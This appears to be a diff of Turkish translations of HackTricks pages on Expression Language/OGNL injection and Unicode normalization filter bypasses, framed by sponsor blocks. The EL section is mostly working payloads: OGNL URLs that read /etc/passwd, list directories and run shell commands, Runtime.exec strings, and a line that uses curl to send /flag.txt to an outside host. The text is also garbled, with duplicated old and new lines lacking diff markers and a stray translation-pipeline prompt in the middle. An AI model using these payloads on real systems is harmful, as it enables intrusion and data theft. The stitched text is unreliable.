Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olacak şekilde öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -2,40 +2,54 @@
<details>
<summary><strong>AWS hackleme becerilerinizi sıfırdan ileri seviyeye taşıyın</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong>!</summary>
<summary><strong>Sıfırdan kahramana AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
* Bir **cybersecurity şirketinde** çalışıyor musunuz? **Şirketinizi HackTricks'te reklamını yapmak** ister misiniz? veya **PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonunu.
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin**.
* **Hacking hilelerinizi** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **ile göndererek paylaşın**.
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizin **HackTricks'te reklamını görmek ister misiniz**? Ya da **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz**? [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* **💬** [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya beni **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin**.
* **Hacking püf noktalarınızı göndererek PR'ler aracılığıyla** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **ile paylaşın**.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Temel Bilgiler
Expression Language (EL), sunum katmanı (örneğin, web sayfaları) ile uygulama mantığı (örneğin, yönetilen nesneler) arasında etkileşim sağlayarak JavaEE'de önemli bir rol oynar. Ağırlıklı olarak şu alanlarda kullanılır:
Expression Language (EL), sunum katmanı (örneğin, web sayfaları) ile uygulama mantığı (örneğin, yönetilen bean'ler) arasında etkileşimlerini sağlayarak JavaEE'de önemlidir. Genellikle şu alanlarda kullanılır:
- **JavaServer Faces (JSF)**: Arayüz bileşenlerini arka uç veri/aksiyonlarına bağlamak için.
- **JavaServer Pages (JSP)**: JSP sayfaları içinde veri erişimi ve manipülasyonu için.
- **Contexts and Dependency Injection for Java EE (CDI)**: Web katmanının yönetilen nesnelerle etkileşimini kolaylaştırmak için.
- **Contexts and Dependency Injection for Java EE (CDI)**: Web katmanının yönetilen bean'lerle etkileşimini kolaylaştırmak için.
**Kullanım Bağlamları**:
- **Spring Framework**: Güvenlik ve Veri gibi çeşitli modüllerde kullanılır.
- **Genel Kullanım**: Java, Kotlin ve Scala gibi JVM tabanlı dillerdeki geliştiriciler tarafından SpEL API aracılığıyla kullanılır.
- **Spring Framework**: Güvenlik ve Veri gibi çeşitli modüllerde uygulanır.
- **Genel Kullanım**: Java, Kotlin ve Scala gibi JVM tabanlı dillerde geliştiriciler tarafından SpEL API aracılığıyla.
EL, JavaEE teknolojilerinde, bağımsız ortamlarda bulunur ve `.jsp` veya `.jsf` dosya uzantıları, yığın hataları ve "Servlet" gibi terimlerle tanınır. Bununla birlikte, özellikleri ve belirli karakterlerin kullanımı sürüm bağımlı olabilir.
EL, JavaEE teknolojilerinde, bağımsız ortamlarda mevcuttur ve `.jsp` veya `.jsf` dosya uzantıları, yığın hataları ve başlıklarda "Servlet" gibi terimlerle tanınabilir. Ancak, özellikleri ve belirli karakterlerin kullanımı sürüm bağımlı olabilir.
{% hint style="info" %}
**EL sürümüne** bağlı olarak bazı **özellikler** **açık** veya **kapalı** olabilir ve genellikle bazı **karakterler** **yasaklanmış** olabilir.
**EL sürümüne** bağlı olarak bazı **özelliklerin** **Açık** veya **Kapalı** olabileceği ve genellikle bazı **karakterlerin** **yasaklanabileceği** unutulmamalıdır.
{% endhint %}
## Temel Örnek
(EL hakkında başka bir ilginç öğreticiye [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/) adresinden ulaşabilirsiniz)
(EL hakkında başka ilginç bir öğreticiye [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/) adresinden ulaşabilirsiniz)
[Maven](https://mvnrepository.com) deposundan aşağıdaki jar dosyalarını indirin:
Maven deposundan aşağıdaki jar dosyalarını indirin:
* `commons-lang3-3.9.jar`
* `spring-core-5.2.1.RELEASE.jar`
@ -63,22 +77,22 @@ System.out.println(result);
}
}
```
Sonra kodu derleyin (eğer `javac` yüklü değilse, `sudo apt install default-jdk` komutunu kullanarak yükleyin):
Sonraki adım, kodu derlemektir (eğer `javac` yüklü değilse, `sudo apt install default-jdk` komutunu kullanarak yükleyin):
```java
javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
```
Uygulamayı şu komutla çalıştırın:
Uygulamayı şu şekilde çalıştırın:
```java
java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main
Enter a String to evaluate:
{5*5}
[25]
```
Önceki örnekte `{5*5}` terimi **değerlendirildi**.
Not alın ki önceki örnekte `{5*5}` terimi **değerlendirildi**.
## **CVE Tabanlı Öğretici**
Bunu **bu gönderide kontrol edin: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
Bunu kontrol et **bu gönderide: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
## Yükler
@ -118,30 +132,22 @@ gk6q${"zkz".toString().replace("k", "x")}doap2
#J2EEScan Detection vector (substitute the content of the response body with the content of the "INJPARAM" parameter concatenated with a sum of integer):
https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}-POST&INJPARAM=HOOK_VAL
```
* 10 saniye bekle
* 10 saniye uyku
```bash
#Blind detection vector (sleep during 10 seconds)
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
```
### Uzaktan Dosya Dahil Etme
Uzaktan Dosya Dahil Etme (Remote File Inclusion), bir web uygulamasının, kullanıcı tarafından kontrol edilebilen bir dosyayı dinamik olarak dahil etmesi nedeniyle ortaya çıkan bir güvenlik açığıdır. Bu açık, saldırganın web sunucusunda bulunan bir dosyayı uzaktan yürütmesine olanak tanır.
Bu saldırı, genellikle web uygulamasının kullanıcı tarafından sağlanan bir parametreyi doğrudan bir dosya yoluna dönüştürdüğü durumlarda gerçekleşir. Saldırgan, bu parametreyi manipüle ederek, kendi kötü niyetli dosyasını dahil etmeyi başarır.
Bu tür bir saldırı, saldırganın web sunucusunda bulunan hassas bilgilere erişmesine veya kötü amaçlı kodu yürütmesine olanak tanır. Bu nedenle, web uygulamalarının güvenliğini sağlamak için, kullanıcı tarafından sağlanan parametrelerin doğru bir şekilde işlenmesi ve güvenlik kontrollerinin uygulanması önemlidir.
### Uzak Dosya Dahil Etme
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=%2fetc%2fpasswd
```
### Dizin Listeleme
Directory listing, bir sunucunun belirli bir dizindeki dosyaları ve alt dizinleri listelemesidir. Bu, bir saldırganın hedef sunucuda bulunan dosyaları keşfetmesine ve potansiyel olarak hassas bilgilere erişmesine olanak tanır. Dizin listeleme saldırıları, genellikle web uygulamalarında kullanılan sunucu tarafı betik enjeksiyonu (Server-Side Template Injection - SSTI) gibi zayıf noktaları hedefler. Bu saldırılar, sunucunun yanıtında görünen hedef dizinlerin veya dosyaların listesini elde etmek için kullanılabilir.
### Dizin Listesi
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=..
```
### Uzaktan Kod Çalıştırma (RCE)
* Temel Uzaktan Kod Çalıştırma **açıklaması**
* Temel RCE **açıklaması**
```bash
#Check the method getRuntime is there
{"".getClass().forName("java.lang.Runtime").getMethods()[6].toString()}
@ -157,11 +163,11 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
# With HTMl entities injection inside the template
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
```
* RCE **linux**
* Uzaktan Kod Çalıştırma **linux**
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
* RCE **Windows** (test edilmedi)
* RCE **Windows** (test edilmemiş)
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
@ -201,33 +207,31 @@ T(java.lang.Runtime).getRuntime().exec('ping my-domain.com')
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c dir").getInputStream())
''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')
```
### Ortamı İnceleme
### Ortamı incelemek
* `applicationScope` - genel uygulama değişkenleri
* `applicationScope` - global uygulama değişkenleri
* `requestScope` - istek değişkenleri
* `initParam` - uygulama başlatma değişkenleri
* `sessionScope` - oturum değişkenleri
* `param.X` - X, bir http parametresinin adı olan param değeri
* `param.X` - X'in bir http parametresinin adı olduğu param değeri
Bu değişkenleri String olarak dönüştürmeniz gerekecektir:
Bu değişkenleri String'e dönüştürmeniz gerekecek:
```bash
${sessionScope.toString()}
```
#### Yetkilendirme atlatma örneği
The following is content from a hacking book about hacking techiques. The following content is from the file /hive/hacktricks/pentesting-web/ssti-server-side-template-injection/el-expression-language.md. Translate the relevant English text to Turkish and return the translation keeping excatly the same markdown and html syntax. Do not translate things like code, hacking technique names, hacking word, cloud/SaaS platform names (like Workspace, aws, gcp...), the word 'leak', pentesting, and markdown tags. Also don't add any extra stuff apart from the translation and markdown syntax.
```bash
${pageContext.request.getSession().setAttribute("admin", true)}
```
Uygulama ayrıca özel değişkenler de kullanabilir, örneğin:
Uygulama ayrıca özel değişkenler de kullanabilir:
```bash
${user}
${password}
${employee.FirstName}
```
## WAF Geçişi
## WAF Atlatma
[https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/) adresine bakın.
[https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/) adresini kontrol edin.
## Referanslar
@ -236,14 +240,26 @@ ${employee.FirstName}
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Bir **cybersecurity şirketinde** çalışıyor musunuz? **Şirketinizi HackTricks'te reklamını görmek** ister misiniz? veya **PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuz olan özel [**NFT'lerimizi**](https://opensea.io/collection/the-peass-family) keşfedin.
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin**.
* **Hacking hilelerinizi** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **ile göndererek paylaşın**.
* **Bir **cybersecurity şirketinde mi çalışıyorsunuz? **HackTricks'te şirketinizi reklamını görmek ister misiniz**? veya **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz**? [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* [**Resmi PEASS & HackTricks swag**](https://peass.creator-spring.com)'ı alın
* **Katılın** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grubuna**](https://discord.gg/hRep4RUj7f) veya **telegram grubuna** veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin.**
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **paylaşın.**
</details>

View file

@ -6,38 +6,52 @@
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
**Bu, şu özetin bir özeti:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Daha fazla ayrıntı için bakın (resimler oradan alınmıştır).
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
**Bu, şu özetin bir özeti:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Daha fazla detay için bakın (resimler oradan alınmıştır).
## Unicode ve Normalizasyonun Anlaşılması
Unicode normalizasyonu, karakterlerin farklı ikili temsillerinin aynı ikili değere standart hale getirildiği bir süreçtir. Bu süreç, programlama ve veri işleme süreçlerinde dizilerle uğraşırken hayati öneme sahiptir. Unicode standardı iki tür karakter eşdeğerliği tanımlar:
Unicode normalizasyonu, karakterlerin farklı ikili temsillerinin aynı ikili değere standart hale getirildiği bir süreçtir. Bu süreç, programlama ve veri işleme süreçlerinde dizelerle uğraşırken hayati öneme sahiptir. Unicode standardı iki tür karakter eşdeğerliği tanımlar:
1. **Kanonik Eşdeğerlik**: Karakterler, yazıldığında veya görüntülendiğinde aynı görünüme ve anlama sahipse kanonik olarak eşdeğer kabul edilir.
2. **Uyumluluk Eşdeğerlik**: Karakterler aynı soyut karakteri temsil edebilir ancak farklı şekilde görüntülenebilirler.
**Dört Unicode normalizasyon algoritması** vardır: NFC, NFD, NFKC ve NFKD. Her algoritma, kanonik ve uyumluluk normalizasyon tekniklerini farklı şekilde kullanır. Daha derinlemesine anlamak için bu teknikleri [Unicode.org](https://unicode.org/) üzerinde keşfedebilirsiniz.
**Dört Unicode normalizasyon algoritması** vardır: NFC, NFD, NFKC ve NFKD. Her algoritma, kanonik ve uyumluluk normalizasyon tekniklerini farklı şekilde kullanır. Daha derinlemesine anlayış için bu teknikleri [Unicode.org](https://unicode.org/) üzerinde keşfedebilirsiniz.
### Unicode Kodlaması Hakkında Ana Noktalar
### Unicode Kodlamasında Ana Noktalar
Unicode kodlamasını anlamak, farklı sistemler veya diller arasındaki etkileşim sorunlarıyla uğraşırken özellikle önemlidir. İşte ana noktalar:
* **Kod Noktaları ve Karakterler**: Unicode'da, her karakter veya sembol, "kod noktası" olarak bilinen bir sayısal değerle ilişkilendirilir.
* **Bayt Temsili**: Kod noktası (veya karakter), bellekte bir veya daha fazla baytla temsil edilir. Örneğin, İngilizce konuşan ülkelerde yaygın olan LATIN-1 karakterleri bir bayt kullanılarak temsil edilir. Ancak, daha büyük bir karakter kümesine sahip diller, temsil için daha fazla bayt gerektirir.
* **Kodlama**: Bu terim, karakterlerin bir dizi bayta nasıl dönüştürüldüğünü ifade eder. UTF-8, ASCII karakterlerinin bir bayt kullanılarak temsil edildiği yaygın bir kodlama standardıdır ve diğer karakterler için dört bayta kadar kullanılır.
* **Bayt Temsili**: Kod noktası (veya karakter), bellekte bir veya daha fazla bayt tarafından temsil edilir. Örneğin, İngilizce konuşulan ülkelerde yaygın olan LATIN-1 karakterleri bir bayt kullanılarak temsil edilir. Ancak, daha fazla karakter kümesine sahip diller, temsil için daha fazla bayt gerektirir.
* **Kodlama**: Bu terim, karakterlerin bir dizi bayta dönüştürülme şeklini ifade eder. UTF-8, ASCII karakterlerinin bir baytla temsil edildiği yaygın bir kodlama standardıdır ve diğer karakterler için dört bayta kadar kullanılır.
* **Veri İşleme**: Veri işleyen sistemler, bayt akışını doğru şekilde karakterlere dönüştürmek için kullanılan kodlamayı bilmelidir.
* **UTF Çeşitleri**: UTF-8'in yanı sıra, UTF-16 (en az 2 bayt, en fazla 4 bayt) ve UTF-32 (tüm karakterler için 4 bayt kullanımı) gibi diğer kodlama standartları bulunmaktadır.
* **UTF Çeşitleri**: UTF-8'in yanı sıra, UTF-16 (en az 2 bayt, en fazla 4) ve UTF-32 (tüm karakterler için 4 bayt kullanır) gibi diğer kodlama standartları bulunmaktadır.
Bu kavramları etkili bir şekilde anlamak, Unicode'ın karmaşıklığından ve çeşitli kodlama yöntemlerinden kaynaklanabilecek potansiyel sorunları etkili bir şekilde ele almak için önemlidir.
Bu kavramları anlamak, Unicode'in karmaşıklığından ve çeşitli kodlama yöntemlerinden kaynaklanan potansiyel sorunları etkili bir şekilde ele almak ve azaltmak için hayati öneme sahiptir.
İki farklı karakteri temsil eden iki farklı baytın Unicode'u nasıl normalize ettiğine dair bir örnek:
İki farklı baytı temsil eden aynı karakteri nasıl normalleştirdiğine dair bir örnek:
```python
unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "chlo\u00e9")
```
@ -45,17 +59,17 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
### Keşfetme
Eğer bir web uygulamasında geriye yansıtılan bir değer bulabilirseniz, **'KELVİN İŞARETİ' (U+0212A)** gönderebilirsiniz ki bu da **"K" olarak normalize edilir** (bu şekilde gönderebilirsiniz `%e2%84%aa`). Eğer geriye bir "K" yansıtılıyorsa, bir tür **Unicode normalizasyonu** gerçekleştiriliyor demektir.
Eğer bir web uygulamasında geriye yansıtılan bir değer bulabilirseniz, **'KELVİN İŞARETİ' (U+0212A)** gönderebilirsiniz ki bu **"K" olarak normalize edilir** (bu şekilde gönderebilirsiniz `%e2%84%aa`). Eğer geriye bir "K" yansıtılıyorsa, o zaman bir tür **Unicode normalizasyonu** gerçekleştiriliyor demektir.
Diğer **örnek**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` **unicode**'den sonra `Leonishan` haline gelir.
Diğer **örnek**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` **unicode**'den sonra `Leonishan` olarak çıkar.
## **Zayıf Örnekler**
### **SQL Injection filtresi atlatma**
Kullanıcı girdisiyle SQL sorguları oluşturmak için karakter `'` kullanan bir web sayfasını hayal edin. Bu web sitesi, güvenlik önlemi olarak, kullanıcı girdisindeki tüm `'` karakterlerini **siler**, ancak bu silme işleminden sonra ve sorgunun oluşturulmadan **önce**, kullanıcı girdisini **Unicode** kullanarak **normalize** eder.
Kullanıcı girdisiyle SQL sorguları oluşturmak için karakter `'` kullanan bir web sayfasını hayal edin. Bu web sitesi, güvenlik önlemi olarak, kullanıcı girdisindeki tüm karakter **`'`**'lerin tümünü **siler**, ancak bu silme işleminden sonra ve sorgunun oluşturulmasından **önce**, kullanıcının girdisini **Unicode** kullanarak **normalize** eder.
Bu durumda, kötü niyetli bir kullanıcı, `' (0x27)`'ye eşdeğer farklı bir Unicode karakteri ekleyebilir, örneğin `%ef%bc%87`, girdi normalize edildiğinde tek tırnak oluşturulur ve bir **SQL Injection açığı** ortaya çıkar:
Bu durumda, kötü niyetli bir kullanıcı, `%ef%bc%87` gibi `' (0x27)`'ye eşdeğer farklı bir Unicode karakteri ekleyebilir, girdi normalize edildiğinde, tek tırnak oluşturulur ve bir **SQL Injection açığı** ortaya çıkar:
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
@ -91,7 +105,7 @@ Bu durumda, kötü niyetli bir kullanıcı, `' (0x27)`'ye eşdeğer farklı bir
### XSS (Cross Site Scripting)
Web uygulamasını kandırmak ve XSS açığını sömürmek için aşağıdaki karakterlerden birini kullanabilirsiniz:
